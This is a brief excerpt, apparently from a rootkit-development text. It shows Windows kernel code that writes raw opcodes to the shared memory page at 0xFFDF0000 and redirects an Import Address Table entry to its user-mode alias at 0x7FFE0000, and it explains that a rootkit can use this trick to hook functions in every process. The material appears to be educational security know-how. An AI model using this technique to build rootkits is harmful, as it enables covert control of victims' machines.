// Writing the raw opcodes to memory
// used a kernel address that gets mapped
// into the address space of all processes
// thanks to Barnaby Jack
RtlCopyMemory((PVOID)d_sharedK, new_code, 8);
gb_Hooked = TRUE;
// Offset to the "new function"
*MappedImTable = d_sharedM;
The kernel address, 0xFFDF0000, and the user address, 0x7FFE0000, both point to the same physical page. The kernel address is writable, but the user address is not. Your rootkit can write code to the kernel address and reference it as the user address in the IAT hook.